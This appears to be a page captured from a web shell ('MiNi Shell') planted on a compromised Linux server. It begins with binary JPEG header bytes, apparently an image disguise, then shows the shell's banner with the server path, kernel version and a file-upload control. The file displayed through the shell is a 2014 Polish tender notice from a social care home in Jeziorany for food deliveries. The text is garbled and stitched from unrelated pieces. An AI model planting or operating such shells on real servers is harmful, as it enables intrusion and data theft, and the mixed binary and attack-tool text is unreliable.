JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141202/394590-N-2014.html

<p class="kh_header"><b>Jeziorany: Dostawa żywności</b><br>
<b>Numer ogłoszenia: 394590 - 2014; data zamieszczenia: 02.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Kajki 49, 11-320 Jeziorany, woj. warmińsko-mazurskie, tel. 0-89 7181 664, faks 0-89 7181 664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsjeziorany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: opieka społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Część I - 		Artykuły spożywcze
	2. Część II -		 Drób
	3. Część III - 		Jaja
	4. Część IV - 		Mrożonki
	5. Część V  - 		Mięso i wędliny
	6. Część VI - 		Ryby i konserwy rybne
	7. Część VII - 		Nabiał
	8  Część VIII -		Pieczywo
	9. Część IX  - 		Warzywa i owoce.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.80.00.00-9, 15.10.00.00-9, 15.11.20.00-7, 15.20.00.00-0, 15.30.00.00-1, 03.14.25.00-3, 15.33.11.00-8, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
1.1.zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy;
1.2.zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy;
1.3.wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
1.4. zmniejszenie realizacji wielkości dostaw zgodnie z Rozd. 3 ust 2  SIWZ .
2.	Zmiany o których mowa w ust. 1 dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsjeziorany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej 
ul.Kajki 49
11-320 Jeziorany
Budynek Administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 10:00, miejsce: Dom Pomocy Społecznej 
ul.Kajki 49
11-320 Jeziorany
Budynek Administracji  Pokój Kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aromaty	400	szt		
	2.	Cukier puder	35	kg		
	3.	Cukier waniliowy	20	kg		
	4.	Cukier kryształ	2300	kg		
	5.	Dżem(mix owoc.)	430	kg		
	6.	Groszek konserwowy	80	kg		
	7.	Herbata granul. Saga	55	kg		
	8.	Koncentrat pomid. 30%	350	kg		
	9.	Kasza manna	70	kg		
	10.	Kasza jęczm. drobna	50	kg		
	11.	Kasza pęczak	100	kg		
	12.	Kasza gryczana	130	kg		
	13.	Ketchup łagodny	320	kg		
	14.	Kakao	18	kg		
	15.	Kawa zboż. Kujawianka	160	kg		
	16.	Przyprawy różne 	3	kg		
	17.	Kwasek cytrynowy	14	kg		
	18.	Liść laurowy	5	kg		
	19.	Margaryna zwykła	540	kg		
	20.	Musztarda stołowa	110	kg		
	21.	Mąka pszenna /450/  tortowa	1400	kg		
	22.	Mąka ziemniaczana	40	kg		
	23.	Olej uniwersalny	420	l		
	24.	Olej słonecznikowy	50	l		
	25.	Ocet 10%	30	l		
	26.	Pasztet drobiowy	380	kg		
	27.	Płatki owsiane	50	kg		
	28.	Przyp. do zup w pł. 1 l.	200	l		
	29.	Proszek do pieczenia	2	kg		
	30.	Sól kuchenna drobna	500	kg		
	31.	Szczaw konserw. kroj.	45	kg		
	32.	Ziele angielskie	5	kg		
	33.	Pieprz natur. mielony	5	kg		
	34.	Pieprz ziołowy	5	kg		
	35.	Majonez stołowy	160	kg		
	36.	Żelatyna spożywcza	1	kg		
	37.	Cynamon	2	kg		
	38.	Papryka miel. słodka	1	kg		
	39.	Miód pszczeli wielokw.	160	kg		
	40.	Konserwa mięs. Tyrol.	400	kg		
	41.	Majeranek	3	kg		
	42.	Delikat do mięs	2	kg		
	43.	Przypr. Uniwersalna	24	kg		
	44.	Bulion jarzynowy	22	kg		
	45.	Syrop owocowy	15	l		
	46.	Chrupki kukurydziane 80 g.	800	szt		
	47.	Kisiel bez cukru	150	kg		
	48.	Budyń bez cukru	24	kg		
	49.	Chrzan konserwowy	22	kg		
	50.	Makaron wstążka	100	kg		
	51.	Płatki kukurydziane	180	kg		
	52.	Rodzynki	20	kg		
	53.	Ryż	300	kg		
	54.	Kukurydza konserwowa	18	kg		
	55.	Soda oczyszczona	2	kg		
	56.	Fasola czerwona	16	kg		
	57.	Brzoskwinie puszka	80	kg		
	58.	Ananas puszka	45	kg		
	60.	Przyprawa Vegeta 	2	kg		
	61.	Makaron kolanka	120	kg		
	62.	Makaron świderki	400	kg		
	63.	Musli	160	kg		
	64.	Makaron krajanka	250	kg		
	65.	Papryka konserwowa	80	kg		
	66.	Woda mineralna niegazowana	450	litry.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Noga z kurczaka-udka 	400	kg		
	2	Udo z kurczaka-ćwiartka tylna	500	kg		
	3	Filet z kurczaka	280	kg		
	4	Skrzydełka 	340	kg		
	5	Porcje rosołowe	250	kg		
	6	Wątróbka drobiowa 	60	kg		
	7	Żołądki drobiowe	180	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja 53g M	21 000	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kalafior mrożony	400	kg		
	2	Mieszanka kompotowa	1000	kg		
	3	Fasolka szparagowa	400	kg		
	4	Wiśnie mrożone	110	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Baleron wędzony	160	kg		
	2	Boczek wędzony	120	kg		
	3	Polędwica sopocka	170	kg		
	4	Polędwica z indyka	150	kg		
	5	Pasztetowa 	120	kg		
	6	Szynka wędzona	170	kg		
	7	Szynkówka drobiowa	80	kg		
	8	Mortadela 	130	kg		
	9	Śląska	80	kg		
	10	Smakoszki 	300	kg		
	11	Parówki śląskie	140	kg		
	12	Zwyczajna 	380	kg		
	13	Żywiecka 	220	kg		
	14	Kaszanka 	200	kg		
	15	Pieczeń Polska	90	kg		
	16	Mielonka turystycz.	140	kg		
	17	Salceson włoski	190	kg		
	18	Kiszka ziemniaczana	90	kg		
	19	Kie łbasa jałowcowa	50	kg		
	20	Szynka konserwowa	130	kg		
	21	Kiełbasa szynkowa	150	kg		
	22	Kiełbasa kanapkowa	110	kg		
	23	Serdelki wieprzowe	60	kg		
	24	Kiełbasa biała parzona	80	kg		
	25	Kiełbasa biesiadna	60	kg		
	26	Karkówka b/kości	180	kg		
	27	Mięso drobne chude	600	kg		
	28	Szynka wp.sur. b/k	340	kg		
	29	Łopatka wp. b/k	700	kg		
	30	Golonka przód	80	kg		
	31	Schab b/k	260	kg		
	32	Żeberka	190	kg		
	33	Słonina	150	kg		
	34	Kości schabowe	1050	kg		
	35	Wątroba wieprzowa	60	kg		
	36	Nogi wieprzowe	120	kg		
	37	Boczek surowy	120	kg		
	38	Wołowina b/k ekstra	70	kg		
	39	Smalec 	280	kg		
	40	Boczek faszerowany	60	kg		
	41	Pasztet rodzinny	90	kg		
	42	Szynka z beczki	140	kg		
	43	Kiełbasa Tatrzańska	80	kg		
	44	Podwawelska regionalna	80	kg		
	45	Rolada z kurczaka	80	kg		
	46	Pasztet z kurczaka	50	kg		
	47	Golonka prasowana	50	kg		
	47	Flaki	40	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby i konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makrela wędzona	150	kg		
	2	Hamburgery rybne z warzywami	80	kg		
	3	Konserwa rybna w pomidorach	180	kg		
	4	Mintaj kostka panierowana	160	kg		
	5	Paprykarz szczeciński	250	kg		
	6	Filety sledziowe małosolne	100	kg		
	7	Tuńczyk w sosie własnym	50	kg		
	8	Panga b/s filet	300	kg		
	9	Rolmopsy	60	kg		
	10	Paluszki rybne	80	kg		
	11	Sałatka rybna	200	kg		
	12	Konserwa rybna w oleju	170	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko 2% w kartoniku	15 000	litr		
	2	Śmietana 18%	620	kg		
	3	Maślanka naturalna	70	kg		
	4	Ser żółty twardy	400	kg		
	5	Ser twarog.półtłust. Krajanka	500	kg		
	6	Ser topiony kostka	220	kg		
	7	Masło extra	1 400	kg		
	8	Serek homogenizow.	200	kg		
	9	Jogurt owocowy	100	kg		
	10	Ser topiony plastry	200	kg		
	11	Kefir	80	kg		
	12	Jogurt naturalny	50	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bułka tarta	230	kg		
	2	Drożdże piekarnicze	20	kg		
	3	Bułka zwykła 0,09	800	szt.		
	4	Chleb pszenny krojony 0,5 kg	4 500	szt.		
	5	Chleb zwykły krojony 0,5 kg	12 300	szt.		
	6	Chleb razowy krojony 0,4 kg	4 600	szt.		
	7	Pączki 0,05	350	szt		
	8	Bułka słodka	700	szt.		
	9	Bułka graham	300	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Buraki czerwone	940	kg		
	2	Cebula	700	kg		
	3	Fasola biała	100	kg		
	4	Groch	80	kg		
	5	Kapusta kiszona	900	kg		
	6	Kapusta biała	800	kg		
	7	Kapusta pekińska	400	kg		
	8	Kapusta świeża	100	kg		
	9	Kapusta czerwona	150	kg		
	10	Brokuły	40	kg		
	11	Ogórki kiszone	600	kg		
	12	Marchewka	2 200	kg		
	13	Ogórki  świeże	400	kg		
	14	Kapusta brukselka	40	kg		
	15	Pietruszka	600	kg		
	16	Por	200	kg		
	17	Szczypior	30	kg		
	18	Seler	540	kg		
	19	Susz warzywny	70	kg		
	20	Ziemniaki	16 000	kg		
	21	Pieczarki	290	kg		
	22	Banany	500	kg		
	23	Cytryna	400	kg		
	24	Czosnek	3	kg		
	25	Jabłka	1 000	kg		
	26	Kiwi	50	kg		
	27	Pomidory	360	kg		
	28	Pomarańcze	190	kg		
	29	Truskawki	40	kg		
	30	Arbuz	60	kg		
	31	Mandarynki	50	kg		
	32	Sałata zielona	40	kg		
	33	Grejfrut	100	kg		
	34	Grzyby suszone	2	kg		
	35	Śliwki suszone	3	kg		
	36	Mak	4	kg		
	37	Rzodkiewka	30	kg		
	38	Szpinak	50	kg		
	39	Ogórki konserwowe	130	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com